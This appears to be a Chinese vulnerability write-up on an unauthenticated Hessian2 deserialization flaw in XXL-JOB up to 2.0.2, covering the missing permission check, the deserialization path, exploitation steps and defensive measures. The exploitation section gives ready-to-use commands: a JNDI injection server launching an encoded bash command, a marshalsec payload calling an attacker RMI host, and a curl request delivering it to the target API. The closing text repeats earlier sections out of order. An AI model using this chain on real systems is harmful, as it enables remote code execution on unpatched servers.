XXL-JOB未授权Hessian2反序列化漏洞分析与利用<\/h1>

漏洞概述<\/h2>

XXL-JOB是一个分布式任务调度平台，在版本<=2.0.2中存在Hessian2反序列化漏洞。该漏洞源于两个关键问题：<\/p>

API接口存在未授权访问问题<\/li>

使用了不安全的Hessian2反序列化实现<\/li> <\/ol>

攻击者可以利用此漏洞在目标服务器上执行任意代码，危害极大。<\/p>

漏洞分析<\/h2>

1. 未授权访问问题<\/h3>
漏洞的核心在于权限校验的缺失。在XXL-JOB的代码中，判断是否有权限限制时默认返回了`false<\/code>，这导致API可以未授权访问。<\/p>`

2. Hessian2反序列化链<\/h3>
反序列化漏洞的触发路径如下：<\/p>

请求进入invokeAdminService<\/code>方法<\/li>
继续跟进到handle<\/code>方法<\/li>
当target<\/code>为空时会进入if判断，触发parseRequest<\/code><\/li>
parseRequest<\/code>方法中，当传入数据不为空时会触发反序列化操作<\/li>
<\/ol>
关键点在于XXL-JOB使用了Hessian2进行反序列化，这是因为在XxlJobDynamicScheduler<\/code>这个动态调度类中调用了initRpcProvider<\/code>方法，明确指定了使用hessian2作为序列化协议。<\/p>
漏洞利用<\/h2>
利用条件<\/h3>

XXL-JOB版本<=2.0.2<\/li>
目标系统开放了XXL-JOB的管理接口<\/li>
目标系统使用的JDK版本不是最新或已配置了trustURLCodebase<\/li>
<\/ul>
利用步骤<\/h3>
1. 确认目标<\/h4>
未授权API地址：<\/p>
http:\/\/目标IP:端口\/xxl-job-admin\/api
<\/code><\/pre>
2. 准备JNDI注入服务<\/h4>
使用工具：JNDI-Injection-Exploit<\/a><\/p>
启动恶意JNDI服务：<\/p>
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 攻击者IP -C "bash -c {echo,base64编码的命令}|{base64,-d}|{bash,-i}"<\/span>
<\/span><\/span><\/code><\/pre>3. 生成Hessian2 payload<\/h4>
使用marshalsec<\/a>工具生成payload：<\/p>
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian2 SpringAbstractBeanFactoryPointcutAdvisor rmi:\/\/攻击者IP:1099\/随机名称 > test.ser
<\/span><\/span><\/code><\/pre>注意<\/strong>：对于高版本JDK需要考虑trustURLCodebase<\/code>限制，需要选择对应的payload。<\/p>
4. 发送恶意请求<\/h4>
使用curl发送payload：<\/p>
curl -XPOST -H "Content-Type: x-application\/hessian"<\/span> --data-binary @test.ser http:\/\/目标IP:端口\/xxl-job-admin\/api
<\/span><\/span><\/code><\/pre>防御措施<\/h2>

升级XXL-JOB<\/strong>：升级到最新版本，官方已修复此漏洞<\/li>
权限控制<\/strong>：确保API接口有适当的权限校验<\/li>
输入验证<\/strong>：对反序列化数据进行严格验证<\/li>
使用白名单<\/strong>：限制可反序列化的类<\/li>
网络隔离<\/strong>：将调度平台部署在内网，限制外部访问<\/li>
<\/ol>
参考链接<\/h2>

XXL-JOB官方仓库<\/a><\/li>
JNDI-Injection-Exploit<\/a><\/li>
marshalsec<\/a><\/li>
<\/ul>
总结<\/h2>
XXL-JOB的Hessian2反序列化漏洞是一个典型的反序列化安全问题，结合未授权访问漏洞，攻击者可以远程执行任意代码。开发人员应重视反序列化操作的安全性，遵循最小权限原则，并及时更新组件版本。<\/p>

XXL-JOB未授权Hessian2反序列化漏洞分析与利用<\/h1>

漏洞分析<\/h2>

1. 未授权访问问题<\/h3> 漏洞的核心在于权限校验的缺失。在XXL-JOB的代码中，判断是否有权限限制时默认返回了false<\/code>，这导致API可以未授权访问。<\/p>

利用步骤<\/h3>

总结<\/h2> XXL-JOB的Hessian2反序列化漏洞是一个典型的反序列化安全问题，结合未授权访问漏洞，攻击者可以远程执行任意代码。开发人员应重视反序列化操作的安全性，遵循最小权限原则，并及时更新组件版本。<\/p>

1. 未授权访问问题<\/h3>
漏洞的核心在于权限校验的缺失。在XXL-JOB的代码中，判断是否有权限限制时默认返回了`false<\/code>，这导致API可以未授权访问。<\/p>`

总结<\/h2>
XXL-JOB的Hessian2反序列化漏洞是一个典型的反序列化安全问题，结合未授权访问漏洞，攻击者可以远程执行任意代码。开发人员应重视反序列化操作的安全性，遵循最小权限原则，并及时更新组件版本。<\/p>